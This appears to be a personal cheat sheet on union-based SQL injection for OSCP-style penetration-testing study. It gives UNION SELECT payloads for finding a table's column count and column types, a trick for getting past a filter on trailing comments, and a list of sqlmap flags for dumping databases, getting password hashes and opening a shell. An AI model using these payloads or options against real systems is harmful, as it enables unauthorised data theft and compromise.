Union-based SQLi is basically just abusing the SQL UNION keyword. This is made slightly easier by the fact that (at least in MySQL) you can SELECT based on a column’s name or position.
Note, however, that referencing columns by positions is deprecated now in the SQL standard, and is gradually being removed from various server implementations.
This means that to determine the number of columns in a table, you’ll need to use a sequence of UNION clauses until you run into and error.
' UNION SELECT NULL --
' UNION SELECT NULL, NULL --
' UNION SELECT NULL, NULL, NULL --
A similar approach can be used to detect column types.
' UNION SELECT 'a', NULL, NULL --
' UNION SELECT NULL, 'a', NULL --
' UNION SELECT NULL, NULL, 'a' --
The generalization to other data types is straight-forward.
Note that sometimes a developer might get “clever” and try to error out on trailing comments. If you suspect that’s happening, just add something after the trailing ` – ` – it’s all a comment, after all!
Useful MySQL keywords:
username(if that column exists in some table)
password(if that column exists in some table)
There’s really just a lot of educated guessing that goes on in SQLi…
Apparently sqlmap isn’t allowed on the OSCP…
--url: Set the target URL
--dbs: List all databases
--all: Dump database
--os-shell: Attempt to obtain working shell on the target
--batch: Do not prompt for input
--dbms: Choose the back-end DBMS (MySQL, PostgreSQL, etc.), if known
--passwords: Attempt to obtain user password hashes
--os-pwn: Attempt to pop a meterpreter shell
--risk: Set maximum risk level of tests (1 - 3)
One handy way to seed a URL is using requests harvested with Burp Suite.